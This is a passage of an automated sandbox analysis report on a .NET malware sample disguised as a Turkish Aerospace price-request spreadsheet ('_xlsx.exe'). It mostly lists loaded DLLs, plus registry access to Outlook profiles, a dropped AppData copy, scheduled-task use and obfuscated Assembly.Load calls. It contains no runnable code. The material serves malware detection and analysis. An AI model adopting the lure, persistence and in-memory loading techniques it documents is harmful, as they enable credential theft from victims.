                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: rasapi32.dll
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: rasman.dll
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: rtutils.dll
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: secur32.dll
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: schannel.dll
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeStatic file information: File size 1083904 > 1048576
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x107e00
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: tsUY.pdbSHA256 source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, WheTgQY.exe.0.dr
                  Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2064388302.00000000071CF000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: tsUY.pdb source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, WheTgQY.exe.0.dr

                  Data Obfuscation

                  barindex
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, Form4.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                  Source: WheTgQY.exe.0.dr, Form4.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, XSC45GRfM1SSKcDUtG.cs.Net Code: NSRsgw9l9W System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, XSC45GRfM1SSKcDUtG.cs.Net Code: NSRsgw9l9W System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, XSC45GRfM1SSKcDUtG.cs.Net Code: NSRsgw9l9W System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.7520000.3.raw.unpack, RK.cs.Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeStatic PE information: 0xF8B3CF14 [Thu Mar 23 05:05:24 2102 UTC]
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 0_2_077C5F6D push FFFFFF8Bh; iretd 0_2_077C5F6F
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_046442AF push ebx; ret 3_2_046442DA
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04640B35 push ebx; iretd 3_2_04640B42
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 9_2_06389390 push es; ret 9_2_063893A0
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 9_2_063861D8 push es; ret 9_2_063861F0
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_0111891E pushad ; iretd 10_2_0111891F
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_01118DDF push esp; iretd 10_2_01118DE0
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_01118C2F pushfd ; iretd 10_2_01118C30
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055D2DBE pushfd ; retf 10_2_055D2DC1
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_00DA9C30 push esp; retf 027Ch16_2_00DA9D55
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_00DA25DD push esp; ret 16_2_00DA25DE
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_00DA891E pushad ; iretd 16_2_00DA891F
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_00DA8C2F pushfd ; iretd 16_2_00DA8C30
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_00DA8DDF push esp; iretd 16_2_00DA8DE0
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeStatic PE information: section name: .text entropy: 6.857381673185179
                  Source: WheTgQY.exe.0.drStatic PE information: section name: .text entropy: 6.857381673185179
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, iCcs8YPAkCV0etVwL9.csHigh entropy of concatenated method names: 'u9Eu1uSUKS', 'X3HuMrkaVY', 'icNuufihhU', 'arluHY9ghP', 'cIduySfnxL', 'l65uhWNKbL', 'Dispose', 'BAYQZ1t4MJ', 'BbWQiYfbuN', 'XFxQLDy4ny'
